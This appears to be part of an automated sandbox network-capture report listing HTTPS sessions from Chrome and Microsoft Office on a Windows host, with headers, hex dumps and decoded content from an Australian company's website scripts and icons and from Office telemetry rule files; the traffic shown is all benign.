                                                                                                                                                                                                            Data Ascii: /** * Initializes the Accordion. * * @private * @param {AccordionConfig} config The Accordion configuration */ function init(config) { that._config = config; // prevents mult
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 20 20 20 20 20 20 73 63 72 6f 6c 6c 54 6f 44 65 65 70 4c 69 6e 6b 49 64 49 6e 41 63 63 6f 72 64 69 6f 6e 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 20 26 26 20 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 2e 61 75 74 68 6f 72 20 26 26 20 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 2e 61 75 74 68 6f 72 2e 4d 65 73 73 61 67 65 43 68 61 6e 6e 65 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2a 20 45 64 69 74 6f 72 20 6d 65 73 73 61 67 65 20 68 61 6e 64 6c 69 6e 67 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2a 20 2d 20 73 75 62 73 63 72 69 62 65 20 74 6f 20 22 63 6d 70 2e 70
                                                                                                                                                                                                            Data Ascii: scrollToDeepLinkIdInAccordion(); } if (window.Granite && window.Granite.author && window.Granite.author.MessageChannel) { /* * Editor message handling: * - subscribe to "cmp.p
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 67 67 6c 65 28 6d 65 73 73 61 67 65 2e 64 61 74 61 2e 69 6e 64 65 78 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 72 65 76 65 72 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 73 74 61 74 65 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 2e 5f 70 72 6f 70 65 72 74 69 65 73 2e 73 69 6e 67 6c 65 45 78 70 61 6e 73 69 6f 6e 20 3d 20 73 69 6e 67 6c 65 45 78 70 61 6e 73 69 6f 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20
                                                                                                                                                                                                            Data Ascii: toggle(message.data.index); // revert to the configured state. that._properties.singleExpansion = singleExpansion; } } });
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 65 78 70 61 6e 64 20 74 68 65 20 61 63 63 6f 72 64 69 6f 6e 20 69 74 65 6d 20 63 6f 6e 74 61 69 6e 69 6e 67 20 74 68 65 20 64 65 65 70 20 6c 69 6e 6b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 49 74 65 6d 45 78 70 61 6e 64 65 64 28 64 65 65 70 4c 69 6e 6b 49 74 65 6d 2c 20 74 72 75 65 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 61 73 68 49 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: } // expand the accordion item containing the deep link setItemExpanded(deepLinkItem, true, true); } var hashId = window.location.hash.substring(1);
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 68 6f 6f 6b 2e 64 61 74 61 73 65 74 5b 4e 53 20 2b 20 22 48 6f 6f 6b 22 20 2b 20 63 61 70 69 74 61 6c 69 7a 65 64 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 68 61 74 2e 5f 65 6c 65 6d 65 6e 74 73 5b 6b 65 79 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 68 61 74 2e 5f 65 6c 65 6d 65 6e 74 73 5b 6b 65 79 5d 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 6d 70 20 3d 20 74 68 61 74 2e 5f 65 6c 65 6d 65 6e 74 73 5b 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: var key = hook.dataset[NS + "Hook" + capitalized]; if (that._elements[key]) { if (!Array.isArray(that._elements[key])) { var tmp = that._elements[key];
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC1369INData Raw: 20 20 20 20 20 20 20 69 66 20 28 76 61 6c 75 65 20 3d 3d 3d 20 6e 75 6c 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 76 61 6c 75 65 20 73 74 69 6c 6c 20 6e 75 6c 6c 2c 20 74 61 6b 65 20 74 68 65 20 70 72 6f 70 65 72 74 79 20 64 65 66 61 75 6c 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 70 72 6f 70 65 72 74 69 65 73 5b 6b 65 79 5d 5b 22 64 65 66 61 75 6c 74 22 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 2e 5f 70 72 6f 70 65 72 74 69 65 73 5b 6b 65 79 5d 20 3d 20 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: if (value === null) { // value still null, take the property default value = properties[key]["default"]; } that._properties[key] = value; }


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            133192.168.2.457816162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC878OUTGET /libs/granite/csrf/token.json HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:54 GMT
                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-sky-isauth: 0
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            expires: -1
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            Set-Cookie: affinity="ca2eaa8d2549435a"; Path=/; HttpOnly; secure
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210064-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730870994.987046,VS0,VS0,VE183
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0402f81479c-DFW
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                            Data Ascii: {}


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            134192.168.2.45781213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                            x-ms-request-id: 94271ffd-901e-0067-294a-2eb5cb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052953Z-15869dbbcc6b69h9hC1DFWaf7800000000z000000000cynp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            135192.168.2.45781413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                            x-ms-request-id: 9327b436-501e-00a3-4e5c-2ec0f2000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052953Z-15869dbbcc6khw88hC1DFWh5f400000006p0000000003vqe
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            136192.168.2.45781313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                            x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052953Z-16547b76f7ftdm8dhC1DFWs13g000000063g00000000f3qm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            137192.168.2.45781113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                            x-ms-request-id: c70a6fb1-401e-000a-3458-2e4a7b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052953Z-17df447cdb54ntx4hC1DFW2k40000000029g00000000cm6v
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            138192.168.2.457819172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC766OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC587INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"1fe-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-lax-kwhp1940147-LAX
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730212281.434392,VS0,VS0,VE732
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 42550
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aa8d84689-DFW
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC517INData Raw: 31 66 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 32 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 31 34 35 34 20 30 2e 32 32 32 32 31 38 43 31 31 2e 33 36 34 32 20 30 2e 32 32 32 32 31 38 20 31 31 2e 35 38 32 36 20 30 2e 33 30 32 35 36 35 20 31 31 2e 37 34 39 37 20 30 2e 34 36 33 36 37 33 43 31 32 2e 30 38 33 34 20 30 2e 37 38 35 34 37 35 20 31 32 2e 30 38 33 34 20 31 2e 33 30 37 31 32 20 31 31 2e 37 34 39 37 20 31 2e 36 32 38 39 32 4c 32 2e 39 35 32 30 37 20 31 30 2e 31 31 31 32 4c 31 31 2e 37 34 39 37 20 31 38 2e
                                                                                                                                                                                                            Data Ascii: 1fe<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            139192.168.2.457818172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC765OUTGET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Tue, 27 Feb 2024 20:17:52 GMT
                                                                                                                                                                                                            etag: W/"2151-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-sjc1000105-SJC
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1710180973.161103,VS0,VS0,VE1
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 529073
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aaf41485e-DFW
